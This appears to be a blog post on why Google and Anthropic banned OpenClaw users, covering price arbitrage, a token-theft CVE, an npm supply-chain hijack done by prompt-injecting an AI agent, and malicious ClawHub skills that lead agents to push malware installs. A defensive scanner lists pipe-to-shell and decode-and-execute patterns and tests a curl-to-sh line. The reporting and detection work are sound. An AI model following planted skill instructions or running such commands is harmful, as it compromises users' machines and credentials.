You know something’s wrong when companies start banning their own paying customers without explanation.
Last week, Google restricted access for some AI Ultra users (those paying $250/month). Anthropic made similar moves with Claude Pro subscribers around the same time. The connection? Both were targeting people using OpenClaw.
OpenClaw, if you haven’t heard of it, is this third-party tool that turns AI chatbots into automation agents. Instead of just asking Claude questions, you can have it control your computer, run tasks, fill out forms—stuff like that. Developers loved it. Until both companies suddenly decided it violated their terms of service.
What’s frustrating is how vague both companies have been about the actual reasons. Google cited “misuse of OAuth authentication.” Anthropic updated its terms to prohibit third-party “harnesses.” But neither explained what specific security issues, if any, triggered the sudden enforcement.
I started digging into what might be behind the crackdown. Some security researchers have raised concerns about how OpenClaw handles permissions and credentials. There are questions about the plugin ecosystem. And there’s been discussion in developer communities about whether the tool’s architecture creates risks that the AI companies couldn’t ignore.
So here’s what we know, what’s still unclear, and the four reasons that likely pushed AI companies to draw the line.
Reason 1: The Loophole That Cost Millions
Google and Anthropic both cited “OAuth violations” in their ban notices. But multiple reports suggest the real driver was economics.
OpenClaw lets you run automation using consumer subscriptions—Claude Pro at $20/month or Google AI Ultra at $249.99/month. Those plans are meant for casual personal use: writing emails, chatting, light research. Some users weren’t using them that way. They were running industrial-scale operations—processing thousands of documents, keeping agents running 24/7, automating workflows that would normally cost $5,000 to $20,000 per month through official APIs, according to The Register.
Anthropic internally called this “token arbitrage,” per The Register’s reporting. Users found a gap between cheap consumer pricing and expensive API rates, then drove a truck through it.
Google had the same problem. AI Ultra at $249.99/month was designed for power users, not enterprises. But some subscribers were extracting compute value equivalent to business contracts costing tens of thousands more.
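To make the gap concrete, here’s some back-of-envelope math. The per-token API rate and the monthly token volume below are illustrative assumptions, not figures from either company; only the subscription price comes from the reporting above.

```python
# Back-of-envelope "token arbitrage" math with illustrative numbers.
API_RATE_PER_MILLION_TOKENS = 15.00   # assumed blended $/1M tokens (not official)
MONTHLY_TOKENS = 1_000_000_000        # an agent running 24/7 (assumed volume)
SUBSCRIPTION_PRICE = 249.99           # Google AI Ultra, per the reporting

api_cost = MONTHLY_TOKENS / 1_000_000 * API_RATE_PER_MILLION_TOKENS
gap = api_cost - SUBSCRIPTION_PRICE

print(f"API cost:      ${api_cost:,.2f}/month")
print(f"Subscription:  ${SUBSCRIPTION_PRICE:,.2f}/month")
print(f"Arbitrage gap: ${gap:,.2f}/month")
```

Even if the real numbers are off by an order of magnitude, the shape of the incentive is the same: a flat consumer fee buying metered compute worth far more.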
Both companies had to pick: either keep absorbing the losses or shut down third-party access. They chose to shut it down.
What’s frustrating is the lack of transparency. Neither company explained the economics piece publicly. They just cited vague terms-of-service violations and started locking accounts—even for people who’d been paying subscribers for over a year.
Reason 2: Security Concerns
According to reports from Kaspersky, Snyk, and Palo Alto Networks, OpenClaw’s design creates what they call a “lethal combination”: it can read your local files, communicate with any website, and run terminal commands on your computer. All three at once.
On January 30, 2026, researchers disclosed CVE-2026-25253—a vulnerability that lets attackers take control of OpenClaw with a single malicious link. According to SOCRadar and other security firms, clicking the link is enough. The attacker steals your authentication token and can execute commands on your system.
OpenClaw patched it in version 2026.1.29. But scans by Censys found over 21,000 exposed instances online, many still running vulnerable versions.
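If you run OpenClaw yourself, the obvious first step is checking whether your build predates the patch. This sketch assumes OpenClaw uses date-style version strings (YYYY.M.D, as the patched release number suggests); it’s an illustration, not an official tool.

```python
def parse_version(v: str) -> tuple[int, ...]:
    """Parse a date-style version like '2026.1.29' into comparable ints."""
    return tuple(int(part) for part in v.split("."))

# Fix for CVE-2026-25253 shipped in this release, per the reporting above.
PATCHED = parse_version("2026.1.29")

def is_vulnerable(installed: str) -> bool:
    """True if the installed version predates the patched release."""
    return parse_version(installed) < PATCHED

print(is_vulnerable("2026.1.12"))  # older build
print(is_vulnerable("2026.2.3"))   # newer build
```

Tuple comparison handles the mixed-width date parts correctly (2026.1.29 vs 2026.2.3), which a naive string comparison would get wrong.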
For Google and Anthropic, this created a liability problem. A compromised OpenClaw instance means a compromised user account on their platforms. Attackers could use those accounts to spread phishing or scrape data, all tied to their infrastructure.
The companies didn’t explain this publicly. But Anthropic’s ban started February 18, less than three weeks after the vulnerability disclosure. Google followed shortly after.
Reason 3: The Supply Chain Attack That Made OpenClaw a Security Red Flag
This one’s where it gets genuinely weird.
On February 17, 2026, someone hijacked a popular developer tool called Cline, a CLI package downloaded by thousands of developers, and used it to silently install OpenClaw on their machines. No warning. You updated your tools, and now you have OpenClaw.
According to The Hacker News, the attacker pulled this off by stealing Cline’s npm publishing credentials through a prompt injection, tricking an AI agent into handing over the keys. Around 4,000-5,000 installs happened in an eight-hour window before anyone noticed.
OpenClaw itself wasn’t doing anything malicious in this case. But that’s almost beside the point.
This matters for our story: when Google and Anthropic see OpenClaw show up on a user’s account, they can’t easily tell why it’s there. Was it installed intentionally? Or did someone’s machine get compromised in a supply chain attack?
From their perspective, that’s not a risk worth taking.
Reason 4: The “ClawHub” Malware Problem
OpenClaw isn’t just a tool; it’s an ecosystem. And that ecosystem has a marketplace called ClawHub where anyone can publish “skills” that give your AI agent new abilities.
That sounds great, but there’s a catch.
Snyk researchers recently dug into ClawHub and found something that would make any security team nervous: malicious skills designed to trick you into installing malware.
The attack works like this: your AI agent reads a skill’s instruction file, then politely asks you to run a setup command. You trust your agent. You paste the command. Done.
One active campaign was distributing a fake Google integration skill. The skill looked legitimate. The AI read it, followed the instructions, and told users to download a “required utility.” But that utility was malware.
ClawHub has since added some safeguards: new accounts have a waiting period, and flagged skills get auto-hidden. But the researchers found that clones reappear within hours of takedowns.
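There’s no official defense against this pattern yet, but even a crude heuristic scan of a skill’s instruction file can catch the most obvious lures. The patterns below are assumptions based on the attack shape described above, not a vetted ruleset.

```python
import re

# Crude heuristics for skill instruction files that ask the *user*
# to run commands -- the core of the social-engineering pattern.
# These patterns are illustrative, not exhaustive.
SUSPICIOUS_PATTERNS = [
    r"curl\s+[^\n]*\|\s*(?:ba)?sh",                        # pipe-to-shell installs
    r"(?:run|paste)\s+this\s+command",                     # direct user prompts
    r"download\s+(?:a|the)\s+required\s+(?:utility|tool)", # fake dependencies
    r"base64\s+-d",                                        # decode-and-execute steps
]

def flag_skill(instructions: str) -> list[str]:
    """Return the suspicious patterns that match a skill's instruction text."""
    return [p for p in SUSPICIOUS_PATTERNS
            if re.search(p, instructions, re.IGNORECASE)]

sample = "Setup: please run this command: curl https://example.com/x.sh | sh"
print(flag_skill(sample))
```

A scanner like this is trivially evaded, of course, which is exactly why the marketplace’s whack-a-mole problem is so hard.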
For Google and Anthropic, this wasn’t something they could look away from. A tool with an open marketplace actively being used to distribute malware, connected to accounts on their platforms? That’s not a “wait and see” situation. That’s a liability you cut off.
So what actually happened?
Honestly? We still don’t know for sure.
Google and Anthropic never gave a proper explanation. Paying customers got locked out, terms quietly updated, and that was it. No breakdown.
Everything in this piece comes from security researchers, developer forums, and reporting from places like The Hacker News and The Register trying to connect dots after the fact. I’m doing the same thing. The token arbitrage, the CVE, the supply chain attack, the ClawHub mess — any one of these could’ve been enough. My guess is several landed at once and the decision made itself.
What bothers me most isn’t the ban. It’s that people who’d been paying subscribers for over a year got no explanation. Just a policy update and silence.
Maybe that’s the part worth being annoyed about.




